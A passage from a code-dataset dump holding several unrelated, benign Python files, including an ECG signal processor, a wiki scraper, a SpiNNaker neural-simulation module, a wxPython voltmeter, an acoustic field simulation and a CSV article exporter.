invert signal\n if guess == 'inv' and guess_perc > 60:\n print(' Inverted signal detected')\n print(' Un-inverting data')\n lst[:] = negdata_flip(lst)\n\n return lst\n\n \n\n## Inverts any raw negative mV peaks data to positive, normal ECG\ndef negdata_flip(data_section):\n ## HeartPy Defaults: enhance_peaks = F, keep_range = T\n enhance_peaks = False\n keep_range = True\n out_array = flip_signal(data_section, enhance_peaks, keep_range)\n\n return out_array\n\n\n \n## Provides user option to save or print processed data locally\ndef print_dict(dictionary, outfile):\n ## Write the header\n header = []\n for key in dictionary:\n header.append(key)\n outfile.write(\", \".join(header) + '\\n')\n\n ## Write data set values\n print_line = []\n for key, items in dictionary.items():\n for i in range(len(dictionary[key])):\n for k in range(len(dictionary)):\n print_line.append(str(dictionary[list(dictionary)[k]][i]))\n outfile.write(\", \".join(print_line) + '\\n')\n print_line.clear()\n\n\n \n## Program begins\nif __name__ == '__main__':\n\n ## Ask user for data set or file name\n dataset = input('HRVY Begin\\nEnter the name of the data set or the file name: ')\n\n ## Call file opener\n contents = file_opener(dataset)\n\n if contents != 'end':\n ## If file present, then unpack tuple\n (hdr, csv) = contents\n\n ## Call hdr_data- dictionary builder & node info\n hdr_info = hdr_data(hdr)\n (hdr_dat, nodes_not_2ms) = hdr_info\n\n ## Call dat_file generation\n dat_align = align_plus_dat(hdr_dat, csv)\n (align_cont, file_dat) = dat_align\n\n ## Call alignment checker & outfile writer\n final_dat = time_out(csv, file_dat, nodes_not_2ms, align_cont)\n\n ## Call printing options\n plot_out(final_dat, dataset)\n\n else:\n print(\"Please try again\")\n\n print('HRVY complete')\n","sub_path":"hrvy_v1.py","file_name":"hrvy_v1.py","file_ext":"py","file_size_in_byte":25351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"207045943","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/confirmation/etc/upgrade/FConfirmationUpgradeMain.py\"\nimport acm\nimport FConfirmationUpgradeDeleteEvent\nimport FConfirmationUpgradeDeprecatedEvents\n\nfrom FOperationsUtils import Log\nfrom FConfirmationHelperFunctions import FConfirmationHelperFunctions as HelperFunctions\nfrom FConfirmationChecksum import CreateChecksum\n\nael_variables = []\n\ndef upgrade_start(parameterDictionary):\n UpgradeChecksum()\n SetExpiryDay()\n FConfirmationUpgradeDeprecatedEvents.UpgradeDeprecatedConfirmations()\n FConfirmationUpgradeDeleteEvent.DeleteDeprecatedEvents()\n\ndef ael_main(parameterDictionary):\n Log(True, 'Confirmation upgrade commenced ...')\n upgrade_start(parameterDictionary)\n Log(True, 'Confirmation upgrade completed ...')\n\ndef UpgradeChecksum():\n confirmations = acm.FConfirmation.Select('')\n counter = 0\n\n Log(True, 'Setting check sum on confirmations ...')\n for confirmation in confirmations:\n if confirmation.IsPostRelease():\n confirmation.Checksum(CreateChecksum(confirmation))\n try:\n confirmation.Commit()\n counter += 1\n if (counter % 1000 == 0):\n Log(True, '%d confirmations updated, please wait ...' % counter)\n except Exception as error:\n Log(True, 'Error when upgrading confirmation %d: %s' % (confirmation.Oid(), error))\n\n Log(True, 'Check sum update completed. %d confirmations updated' % counter)\n\ndef SetExpiryDay():\n confirmations = acm.FConfirmation.Select('')\n counter = 0\n calendar = HelperFunctions.GetDefaultCalendar()\n Log(True, 'Setting expiry day on confirmations ...')\n\n for confirmation in confirmations:\n createTime = acm.Time.DateFromTime(confirmation.CreateTime())\n expiryDay = calendar.AdjustBankingDays(createTime, 10)\n confirmation.ExpiryDay(expiryDay)\n try:\n confirmation.Commit()\n counter += 1\n if (counter % 1000 == 0):\n Log(True, '%d confirmations updated, please wait ...' % counter)\n except Exception as error:\n Log(True, 'Error when upgrading confirmation %d: %s' % (confirmation.Oid(), error))\n\n Log(True, 'Expiry day update completed. %d confirmations updated' % counter)\n\n","sub_path":"Extensions/Default/FPythonCode/FConfirmationUpgradeMain.py","file_name":"FConfirmationUpgradeMain.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"163326743","text":"import scrapy\nimport string\n\n\nclass OnepieceSpider(scrapy.Spider):\n name = 'char_info'\n allowed_domains = ['onepiece.fandom.com']\n\n def start_requests(self):\n urls = ['https://onepiece.fandom.com/wiki/List_of_Canon_Characters']\n for url in urls:\n yield scrapy.Request(url, self.extract_links)\n\n def extract_links(self, response):\n characters = response.xpath(\n \"//h2[1]//following::table[position()<3]//tbody/tr/td[2]/a/@href\").getall()\n for character in characters:\n yield response.follow(character, callback=self.extract_info)\n\n def extract_info(self, response):\n character = response.xpath(\n \"//aside//*[contains(@class,'pi-item pi-item-spacing pi-title')]/text()\").get()\n sections = response.xpath(\n \"//aside/*[contains(@class, 'pi-item pi-group')]\")\n section_data = {}\n for section in sections:\n\n section_name = section.xpath(\"descendant::h2/text()\").get()\n data_items = section.xpath(\"descendant::div[contains(@class, 'pi-item pi-data')]\")\n if len(data_items) > 0: \n data_labels = []\n data_values = []\n for item in data_items:\n data_labels.append(item.xpath(\"descendant::*[contains(@class, 'pi-data-label')]/text()\").get())\n data_values.append(item.xpath(\"descendant::*[contains(@class, 'pi-data-value')]//text()\").getall())\n section_items = dict(zip([label.translate(str.maketrans('', '', string.punctuation)) for label in data_labels], [''.join(value) for value in data_values])) \n section_data[section_name] = section_items\n yield {character: section_data}\n","sub_path":"one_piece_character_data_scraper/spiders/char_info.py","file_name":"char_info.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"397653397","text":"\nfrom spynnaker.pyNN.utilities import constants\nfrom spynnaker.pyNN.models.utility_models.delay_block import DelayBlock\nfrom spynnaker.pyNN.models.utility_models.delay_extension_partitioned_vertex \\\n import DelayExtensionPartitionedVertex\n\nfrom spinn_front_end_common.abstract_models.\\\n abstract_provides_outgoing_partition_constraints import \\\n AbstractProvidesOutgoingPartitionConstraints\nfrom spinn_front_end_common.utilities import constants as common_constants\nfrom spinn_front_end_common.abstract_models\\\n .abstract_provides_n_keys_for_partition \\\n import AbstractProvidesNKeysForPartition\nfrom spinn_front_end_common.abstract_models.abstract_data_specable_vertex \\\n import AbstractDataSpecableVertex\n\nfrom pacman.model.constraints.partitioner_constraints.\\\n partitioner_same_size_as_vertex_constraint \\\n import PartitionerSameSizeAsVertexConstraint\nfrom pacman.model.constraints.key_allocator_constraints\\\n .key_allocator_contiguous_range_constraint \\\n import KeyAllocatorContiguousRangeContraint\nfrom pacman.model.partitionable_graph.abstract_partitionable_vertex \\\n import AbstractPartitionableVertex\n\nfrom data_specification.data_specification_generator\\\n import DataSpecificationGenerator\n\nimport logging\nimport math\n\nlogger = logging.getLogger(__name__)\n\n_DELAY_PARAM_HEADER_WORDS = 5\n\n\nclass DelayExtensionVertex(\n AbstractPartitionableVertex,\n AbstractDataSpecableVertex,\n AbstractProvidesOutgoingPartitionConstraints,\n AbstractProvidesNKeysForPartition):\n \"\"\" Provide delays to incoming spikes in multiples of the maximum delays\\\n of a neuron (typically 16 or 32)\n \"\"\"\n\n _DEFAULT_MALLOCS_USED = 2\n\n def __init__(self, n_neurons, delay_per_stage, source_vertex,\n machine_time_step, timescale_factor, constraints=None,\n label=\"DelayExtension\"):\n \"\"\"\n Creates a new DelayExtension Object.\n \"\"\"\n AbstractPartitionableVertex.__init__(\n self, n_neurons, label, 256, constraints)\n AbstractDataSpecableVertex.__init__(\n self, machine_time_step=machine_time_step,\n timescale_factor=timescale_factor)\n AbstractProvidesOutgoingPartitionConstraints.__init__(self)\n AbstractProvidesNKeysForPartition.__init__(self)\n\n self._source_vertex = source_vertex\n self._n_delay_stages = 0\n self._delay_per_stage = delay_per_stage\n\n # Dictionary of vertex_slice -> delay block for data specification\n self._delay_blocks = dict()\n\n self.add_constraint(\n PartitionerSameSizeAsVertexConstraint(source_vertex))\n\n def create_subvertex(\n self, vertex_slice, resources_required, label=None,\n constraints=None):\n return DelayExtensionPartitionedVertex(\n resources_required, label, constraints)\n\n @property\n def model_name(self):\n return \"DelayExtension\"\n\n @property\n def n_delay_stages(self):\n \"\"\" The maximum number of delay stages required by any connection\n out of this delay extension vertex\n \"\"\"\n return self._n_delay_stages\n\n @n_delay_stages.setter\n def n_delay_stages(self, n_delay_stages):\n self._n_delay_stages = n_delay_stages\n\n @property\n def source_vertex(self):\n return self._source_vertex\n\n def add_delays(self, vertex_slice, source_ids, stages):\n \"\"\" Add delayed connections for a given vertex slice\n \"\"\"\n key = (vertex_slice.lo_atom, vertex_slice.hi_atom)\n if key not in self._delay_blocks:\n self._delay_blocks[key] = DelayBlock(\n self._n_delay_stages, self._delay_per_stage, vertex_slice)\n [self._delay_blocks[key].add_delay(source_id, stage)\n for (source_id, stage) in zip(source_ids, stages)]\n\n def generate_data_spec(\n self, subvertex, placement, partitioned_graph, graph, routing_info,\n hostname, graph_mapper, report_folder, ip_tags, reverse_ip_tags,\n write_text_specs, application_run_time_folder):\n data_writer, report_writer = \\\n self.get_data_spec_file_writers(\n placement.x, placement.y, placement.p, hostname, report_folder,\n write_text_specs, application_run_time_folder)\n\n spec = DataSpecificationGenerator(data_writer, report_writer)\n\n # Reserve memory:\n spec.comment(\"\\nReserving memory space for data regions:\\n\\n\")\n\n # ###################################################################\n # Reserve SDRAM space for memory areas:\n vertex_slice = graph_mapper.get_subvertex_slice(subvertex)\n n_words_per_stage = int(math.ceil(vertex_slice.n_atoms / 32.0))\n delay_params_sz = 4 * (_DELAY_PARAM_HEADER_WORDS +\n (self._n_delay_stages * n_words_per_stage))\n\n spec.reserve_memory_region(\n region=(\n DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.SYSTEM.value),\n size=common_constants.DATA_SPECABLE_BASIC_SETUP_INFO_N_WORDS * 4,\n label='setup')\n\n spec.reserve_memory_region(\n region=(\n DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.DELAY_PARAMS.value),\n size=delay_params_sz, label='delay_params')\n\n subvertex.reserve_provenance_data_region(spec)\n\n self.write_setup_info(spec)\n\n spec.comment(\"\\n*** Spec for Delay Extension Instance ***\\n\\n\")\n\n key = None\n partitions = partitioned_graph.\\\n outgoing_edges_partitions_from_vertex(subvertex)\n for partition in partitions.values():\n keys_and_masks = \\\n routing_info.get_keys_and_masks_from_partition(partition)\n\n # NOTE: using the first key assigned as the key. Should in future\n # get the list of keys and use one per neuron, to allow arbitrary\n # key and mask assignments\n key = keys_and_masks[0].key\n\n incoming_key = None\n incoming_mask = None\n incoming_edges = partitioned_graph.incoming_subedges_from_subvertex(\n subvertex)\n\n\n for incoming_edge in incoming_edges:\n incoming_slice = graph_mapper.get_subvertex_slice(\n incoming_edge.pre_subvertex)\n if (incoming_slice.lo_atom == vertex_slice.lo_atom and\n incoming_slice.hi_atom == vertex_slice.hi_atom):\n partition = partitioned_graph.get_partition_of_subedge(\n incoming_edge)\n keys_and_masks = \\\n routing_info.get_keys_and_masks_from_partition(partition)\n incoming_key = keys_and_masks[0].key\n incoming_mask = keys_and_masks[0].mask\n\n self.write_delay_parameters(\n spec, vertex_slice, key, incoming_key, incoming_mask)\n # End-of-Spec:\n spec.end_specification()\n data_writer.close()\n\n return data_writer.filename\n\n def write_setup_info(self, spec):\n\n # Write this to the system region (to be picked up by the simulation):\n self._write_basic_setup_info(\n spec,\n (DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.SYSTEM.value))\n\n def write_delay_parameters(\n self, spec, vertex_slice, key, incoming_key, incoming_mask):\n \"\"\" Generate Delay Parameter data\n \"\"\"\n\n # Write spec with commands to construct required delay region:\n spec.comment(\"\\nWriting Delay Parameters for {} Neurons:\\n\"\n .format(vertex_slice.n_atoms))\n\n # Set the focus to the memory region 2 (delay parameters):\n spec.switch_write_focus(\n region=(\n DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.DELAY_PARAMS.value))\n\n # Write header info to the memory region:\n # Write Key info for this core and the incoming key and mask:\n spec.write_value(data=key)\n spec.write_value(data=incoming_key)\n spec.write_value(data=incoming_mask)\n\n # Write the number of neurons in the block:\n spec.write_value(data=vertex_slice.n_atoms)\n\n # Write the number of blocks of delays:\n spec.write_value(data=self._n_delay_stages)\n\n # Write the actual delay blocks\n spec.write_array(array_values=self._delay_blocks[(\n vertex_slice.lo_atom, vertex_slice.hi_atom)].delay_block)\n\n # inherited from partitionable vertex\n def get_cpu_usage_for_atoms(self, vertex_slice, graph):\n n_atoms = (vertex_slice.hi_atom - vertex_slice.lo_atom) + 1\n return 128 * n_atoms\n\n def get_sdram_usage_for_atoms(self, vertex_slice, graph):\n size_of_mallocs = (\n self._DEFAULT_MALLOCS_USED *\n common_constants.SARK_PER_MALLOC_SDRAM_USAGE)\n return (\n size_of_mallocs +\n DelayExtensionPartitionedVertex.get_provenance_data_size(0))\n\n n_words_per_stage = int(math.ceil(vertex_slice.n_atoms / 32.0))\n return ((constants.BLOCK_INDEX_HEADER_WORDS * 4) +\n (_DELAY_PARAM_HEADER_WORDS * 4) +\n (n_words_per_stage * self._n_delay_stages * 4) +\n size_of_mallocs)\n\n def get_dtcm_usage_for_atoms(self, vertex_slice, graph):\n n_atoms = (vertex_slice.hi_atom - vertex_slice.lo_atom) + 1\n return (44 + (16 * 4)) * n_atoms\n\n def get_binary_file_name(self):\n return \"delay_extension.aplx\"\n\n def is_data_specable(self):\n return True\n\n def get_n_keys_for_partition(self, partition, graph_mapper):\n vertex_slice = graph_mapper.get_subvertex_slice(\n partition.edges[0].pre_subvertex)\n if self._n_delay_stages == 0:\n return 1\n return vertex_slice.n_atoms * self._n_delay_stages\n\n def get_outgoing_partition_constraints(self, partition, graph_mapper):\n return [KeyAllocatorContiguousRangeContraint()]\n","sub_path":"src/spinnaker_ros_lsm/venv/lib/python2.7/site-packages/spynnaker/pyNN/models/utility_models/delay_extension_vertex.py","file_name":"delay_extension_vertex.py","file_ext":"py","file_size_in_byte":10044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"338011364","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\nfrom model.attr_net import Attr_Net\nimport bin.attr_test_att as attr_test\n\n# configure\nmodel_data_path = '/hdd/lujunyu/dataset/meituan/'\nmodel_path = '/hdd/lujunyu/model/meituan/'\n\nconf = {\n 'train_data_path' : os.path.join(model_data_path, 'train.pkl'),\n 'dev_data_path' : os.path.join(model_data_path, 'dev.pkl'),\n 'testa_data_path' : os.path.join(model_data_path, 'testa.pkl'),\n 'domain_emb_path': os.path.join(model_data_path, 'emb4data.pkl'),\n 'fasttext_emb_path': os.path.join(model_data_path, 'fasttext_emb4data.pkl'),\n 'tencent_emb_path': os.path.join(model_data_path, 'tencent_emb4data.pkl'),\n\n \"attr_init_model\": '/hdd/lujunyu/model/meituan/D_HAN_MC/attr6/', #should be set for test\n\n \"rand_seed\": None,\n \"learning_rate\":3e-4,\n \"vocab_size\": 212307, #111695\n \"domain_emb_dim\": 100,\n \"tencent_emb_dim\": 200,\n \"fasttext_emb_dim\": 300,\n \"batch_size\": 10, #200 for test\n\n \"max_rev_len\": 30,\n \"max_sent_len\": 300,\n 'attribute_num': 20,\n 'attribute_prototype': 3,\n\n \"max_to_keep\": 1,\n \"num_scan_data\": 10,\n \"\": 0, #1455 for DSTC7, 28270 for DAM_source, #1 for douban data , 6 for advising\n\n \"rnn_layers\":3,\n \"sent_attention_layers\":2,\n \"doc_attention_layers\":2,\n \"rnn_dim\":300,\n\n \"drop_out\":False,\n 'batch_normalization':False,\n\n 'Model': 'D_HAN_MC'\n}\nconf.update({'save_path' : os.path.join(model_path, conf['Model'] + '/attr6/')})\nconf.update({'emb_dim' : conf['domain_emb_dim'] + conf['tencent_emb_dim']})\n\n\nif __name__ == '__main__':\n\n model = Attr_Net(conf)\n attr_test.test(conf, model)\n\n\n","sub_path":"test_attr.py","file_name":"test_attr.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"165924092","text":"#!/usr/bin/python\n\nimport spidev\nimport time\nimport os\nimport wx\n\nID_SETTINGS_MAXTIME = wx.NewId()\nID_SETTINGS_SAMPLE_RATE = wx.NewId()\n\nclass windowClass(wx.Frame):\n\n def __init__(self, *args, **kwargs):\n wx.Frame.__init__(self, None, -1, 'Voltmeter')\n\n self.maxTime = 10\n self.samplingRate = 250\n self.initSPI()\n self.initADC()\n self.basicWindow()\n\n def initSPI(self):\n self.spi = spidev.SpiDev()\n self.spi.open(0,0)\n\n def initADC(self):\n self.channel = 0\n self.volts_accum = 0\n self.num_reads = 0\n self.Running = False\n self.start_time = 0\n\n def ReadChannel(self, channel):\n adc = self.spi.xfer2([1,(8+channel)<<4,0])\n data = ((adc[1]&3) << 8) + adc[2]\n return data\n\n def ConvertVolts(self, data,places):\n #volts = (data * 3.3) / float(1023)\n volts = (data * 5.0) / float(1023)\n volts = round(volts,places)\n return volts\n\n def basicWindow(self):\n panel = wx.Panel(self)\n \n menuBar = wx.MenuBar()\n \n fileButton = wx.Menu()\n settingsButton = wx.Menu()\n \n exitItem = wx.MenuItem(fileButton, wx.ID_EXIT, 'Quit')\n fileButton.AppendItem(exitItem)\n\n self.maxTimeButton = wx.MenuItem(settingsButton, ID_SETTINGS_MAXTIME,\n 'Max Sampling Time')\n settingsButton.AppendItem(self.maxTimeButton)\n \n self.sampleRateButton = wx.MenuItem(settingsButton, ID_SETTINGS_SAMPLE_RATE,\n 'Sampling Rate')\n settingsButton.AppendItem(self.sampleRateButton)\n \n menuBar.Append(fileButton, 'File')\n menuBar.Append(settingsButton, 'Settings')\n self.SetMenuBar(menuBar)\n self.Bind(wx.EVT_MENU, self.Quit, exitItem)\n self.Bind(wx.EVT_MENU, self.SetMaxTime, self.maxTimeButton)\n self.Bind(wx.EVT_MENU, self.SetSampleRate, self.sampleRateButton)\n \n sizer = wx.FlexGridSizer(cols=3, hgap=15, vgap=5)\n\n label_volts = wx.StaticText(panel, label=\"Voltage\")\n sizer.Add(label_volts, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n label_avg = wx.StaticText(panel, label=\"Running Average\")\n sizer.Add(label_avg, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n label_elapse_time = wx.StaticText(panel, label=\"Elapse Time (sec)\")\n sizer.Add(label_elapse_time, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n \n self.volts = wx.StaticText(panel, label=\"0.000\")\n sizer.Add(self.volts, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n self.volts_avg = wx.StaticText(panel, label=\"0.000\")\n sizer.Add(self.volts_avg, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n self.elapse_time = wx.StaticText(panel, label=\"000\")\n sizer.Add(self.elapse_time, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n \n self.startButton = wx.Button(panel, -1, label=\"Start\")\n self.Bind(wx.EVT_BUTTON, self.StartStop, self.startButton)\n sizer.Add(self.startButton, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n self.startButton.SetBackgroundColour('lightgreen')\n \n panel.SetSizer(sizer)\n sizer.Fit(self)\n sizer.SetSizeHints(self)\n \n self.Show(True)\n\n self.heartbeat()\n \n def StartStop(self, event):\n if self.Running == True:\n #Was already running, need to stop,\n # update button label to \"Start\"\n self.Running = False\n self.startButton.SetLabel(\"Start\")\n self.startButton.SetBackgroundColour('lightgreen')\n else:\n #Was stopped.\n # 1) update button to \"Stop\"\n # 2) clear vars\n # 3) store start time\n # 4) start\n self.initADC()\n self.startButton.SetLabel(\"Stop\")\n self.startButton.SetBackgroundColour('red')\n self.Running = True\n self.start_time = time.time()\n self.heartbeat()\n \n \n def Quit(self, e):\n self.Close()\n\n def updateVoltDisplay(self):\n level = self.ReadChannel(self.channel)\n voltage = self.ConvertVolts(level,4)\n self.volts.SetLabel('%0.4f' % voltage)\n self.num_reads += 1\n self.volts_accum += voltage\n volts_avg = self.volts_accum / self.num_reads\n self.volts_avg.SetLabel('%0.4f' % volts_avg)\n elapsed_time = time.time() - self.start_time\n self.elapse_time.SetLabel('%3i' % elapsed_time)\n if elapsed_time >= self.maxTime:\n self.StartStop(None)\n\n def heartbeat(self):\n if self.Running == True:\n self.updateVoltDisplay()\n wx.CallLater(self.samplingRate, self.heartbeat)\n\n def SetMaxTime(self, event):\n maxTimeBox = wx.TextEntryDialog(None, 'Enter maximum time in seconds.',\n 'Max Sampling Time', str(self.maxTime))\n if maxTimeBox.ShowModal() == wx.ID_OK:\n mTime = maxTimeBox.GetValue()\n try:\n stripped = str(int(mTime))\n self.maxTime = int(mTime)\n except:\n return\n\n def SetSampleRate(self, event):\n samplingRateBox = wx.TextEntryDialog(None, 'Enter sampling rate time in msecs. (200-1000)',\n 'Sampling Rate', str(self.samplingRate))\n if samplingRateBox.ShowModal() == wx.ID_OK:\n sRate = samplingRateBox.GetValue()\n try:\n stripped = str(int(sRate))\n if int(sRate) >= 250 and int(sRate) <= 1000:\n self.samplingRate = int(sRate)\n except:\n return\n\n\n\n\n\n\ndef main():\n app = wx.App()\n windowClass(None)\n\n app.MainLoop()\n\nmain()\n","sub_path":"wxVoltageDisplay.py","file_name":"wxVoltageDisplay.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"287018852","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.special as sp\nfrom tqdm import tqdm\n\nmpl.rcParams['pcolor.shading'] = 'auto'\nfont = {'family': 'serif',\n 'weight': 'regular',\n 'size': 12}\nmpl.rc('font', **font)\n\nfig, axs = plt.subplots(\n 1, 4,\n subplot_kw={'projection': 'polar'},\n tight_layout=True,\n figsize=(7.1, 5)\n)\n\ndef kronecker(i, j):\n return 1 if i == j else 0\n\npts = 100\nR = 1\nM = 2; N = 2 # modes to observe in the cavity\nradius = np.linspace(0, R, pts)\ntheta = np.linspace(0, 2 * np.pi, pts)\nRR, TT = np.meshgrid(radius, theta)\n\ndef amps(m, n, pos, om, q0):\n r0, a0 = pos\n dm0 = kronecker(m, 0)\n kmn = sp.jnp_zeros(m, n + 1)[-1] / R \n qstar = om * q0\n \n bst = sp.jv(m, kmn * r0) / sp.jv(m, kmn * R)**2\n #print(bst, kmn)\n amn = (2 * qstar * r0 * np.cos(m * a0) * kmn**2) \\\n / ((1 + dm0) * np.pi * (k**2 - kmn**2) * ((kmn * R)**2 - m**2)) * bst\n bmn = (2 * qstar * r0 * np.sin(m * a0) * kmn**2) \\\n / ((1 - dm0) * np.pi * (k**2 - kmn**2) * ((kmn * R)**2 - m**2)) * bst\n return amn, bmn, kmn\n\ndef pressure_field(t, om, q0, pos, phi):\n prt = np.zeros((pts, pts), dtype=complex)\n for m in range(1, M + 1):\n for n in range(0, N + 1):\n amn, bmn, kmn = amps(m, n, pos, om, q0)\n p_given_mode = (amn * np.cos(m * TT) + bmn * np.sin(m * TT)) * sp.jv(m, kmn * RR)\n prt += p_given_mode \n return prt * np.exp(1j * (om * t - phi))\n\nq0 = 1e-3\nc0 = 343\nk_cav = (sp.jnp_zeros(M, N + 1)[-1] / R)# + 150\nprint(k_cav)\nk = k_cav + 0.00001\nom = k * c0\nprint(om / 2 * np.pi)\n\nrr = 0.5\nnb_source = 25\n\nfor t, ax in zip([2e-4, 5e-4, 7e-4, 9e-4], axs.flat):\n prt = np.zeros((pts, pts), dtype=complex)\n for n in range(nb_source):\n pos = (rr, (2 * n * np.pi / nb_source))\n ax.plot(pos[1], pos[0], 'ko', mfc='none')\n p = pressure_field(t, om, q0, pos, 2 * n * np.pi / nb_source)\n prt += p\n\n oui = ax.pcolormesh(TT, RR, prt.real, cmap='RdBu_r')\n # fig.colorbar(oui, ax=ax)\n ax.set_title(\"t = {:.4f} s\".format(t))\n ax.set_rticks([0, R/4, R/2, 3*R/4, R])\n # ax.set_rlabel_position(-np.pi/2)\n ax.set_xticks(np.pi/180. * np.arange(45, 316, 90))\n ax.set_theta_direction(-1)\n ax.set_theta_zero_location(\"N\") # Zero on top (north)\n #ax.grid(True) \n\nplt.show()","sub_path":"simulations/2dcase_timeev.py","file_name":"2dcase_timeev.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"635018887","text":"# -*- coding: utf-8 -*-\nimport sys\nimport numpy as np\nimport pandas as pd\n\n'''\nAramaki-text.csv を処理する\n'''\n\n''' parameters '''\ninpath = sys.argv[1]\nword = '桜島'\noutpath = './{0}/{0}_frequency_{1}'.format(word, sys.argv[1])\n\n''' データ読み込み '''\ndf = pd.read_csv(inpath, header=None, error_bad_lines=False)\n\n''' データ前処理 '''\ndf.columns = ['time', 'tweet']\ndf = df.set_index('time')\ndf.index = pd.to_datetime(df.index, errors='coerce')\ndf = df.dropna() # 欠損値除去\n\n''' word を含むツイートを抽出 '''\ndf = df[df['tweet'].str.contains(word)]\ndf['counter'] = np.ones(df.shape[0])\n\n''' save '''\nresult = df.resample('D').sum()\nresult.to_csv(outpath)\n","sub_path":"Scripts/analize_aramaki-csv.py","file_name":"analize_aramaki-csv.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"610688428","text":"#Pedro Gallino\n#9/18/17\n#coloredSquare.py - makes a random number\n\nfrom ggame import *\nfrom random import randint\n\nnum = randint(1,6)\n\nif num == 1:\n red = Color(0xff0000,1)\n line = LineStyle(3,red)\n rectangle = RectangleAsset(100,100,line,red)\nelif num == 2:\n blue = Color(0x000ff,1)\n line = LineStyle(3,blue)\n rectangle = RectangleAsset(100,100,line,blue)\nelif num == 3:\n yellow = Color(0xffff00,1)\n line = LineStyle(3,yellow)\n rectangle = RectangleAsset(100,100,line,yellow)\nelif num == 4:\n purpel = Color(0xff33ff,1)\n line = LineStyle(3,purpel)\n rectangle = RectangleAsset(100,100,line,purpel)\nelif num == 5:\n green = Color(0x66cc00,1)\n line = LineStyle(3,green)\n rectangle = RectangleAsset(100,100,line,green)\nelif num == 6:\n orange = Color(0xff8000,1)\n line = LineStyle(3,orange)\n rectangle = RectangleAsset(100,100,line,orange)\n\nSprite(rectangle)\nmyApp = App()\nmyApp.run()\n","sub_path":"coloredSquare.py","file_name":"coloredSquare.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650846815","text":"import csv\nimport os\nimport datetime\n\nclass Article:\n def __init__(self, order_number, name, unit, price_net, available=True, note=\"\", manufacturer=\"\", origin=\"\", vat=0, deposit=0, unit_quantity=1, category=\"\"):\n self.available = available\n self.order_number = order_number\n self.name = name\n self.note = note\n self.manufacturer = manufacturer\n self.origin = origin\n self.unit = unit\n self.price_net = price_net\n self.vat = vat\n self.deposit = deposit\n self.unit_quantity = unit_quantity\n self.category = category\n\ndef validate_string(string, string_type):\n string = str(string)\n if len(string) > 255:\n shortened_string = string[0:252] + '...'\n print(\"Overlong article \" + string_type + \" (\" + str(len(string)) + \" characters) registered:\")\n print(string)\n print(\"shortened to:\")\n print(shortened_string)\n string = shortened_string\n\n string.replace(';', ',')\n return string\n\ndef get_data_from_articles(articles):\n rows = []\n for article in articles:\n\n avail = ''\n if not article.available:\n avail = 'x'\n\n article_data = [avail, validate_string(article.order_number, 'order number'), validate_string(article.name, 'name'), validate_string(article.note, 'note'), validate_string(article.manufacturer, 'manufacturer'), \n validate_string(article.origin, 'origin'), validate_string(article.unit, 'unit'), article.price_net, article.vat, article.deposit, article.unit_quantity, '', '', article.category]\n rows.append(article_data)\n\n return rows\n\ndef write_csv(supplier, articles):\n rows = get_data_from_articles(articles=articles)\n\n if not os.path.exists(\"output\"):\n os.makedirs(\"output\")\n file_name = supplier + datetime.date.today().isoformat()\n number = 1\n while os.path.isfile('output/' + file_name + '_' + str(number) + '.csv'):\n number += 1\n\n with open('output/' + file_name + '_' + str(number) + '.csv', 'w', encoding='UTF8', newline='') as f:\n writer = csv.writer(f, delimiter=';')\n writer.writerow(['avail.', 'Order number', 'Name', 'Note', 'Manufacturer', 'Origin', 'Unit', 'Price (net)', 'VAT', 'Deposit', 'Unit quantity', '', '', 'Category'])\n writer.writerows(rows)","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"33947347","text":"\"\"\"\nCommands for dealing with tagged folders.\n\"\"\"\nimport collections\n\nimport qq\nimport os\n\n\nclass TagStorage(qq.Storage):\n def __init__(self):\n super(TagStorage, self).__init__('tags')\n if 'tags' not in self or not isinstance(self['tags'], collections.Mapping):\n self['tags'] = dict()\n\n\nclass TagCommand(qq.QQCommand):\n \"\"\"\n Tag a folder to return to later.\n \"\"\"\n\n name = 'tag'\n shorttext = 'Tag a folder with a bookmark name'\n\n def execute(self, *args):\n if len(args) == 1:\n path = os.getcwd()\n name = args[0]\n elif len(args) == 2:\n path = args[0]\n name = args[1]\n else:\n raise qq.QQBadInvocation()\n\n tags = TagStorage()\n tags['tags'][name] = path\n qq.output('Tagged folder {} with name \"{}\".'.format(path, name))\n return True\n\n def help(self):\n return 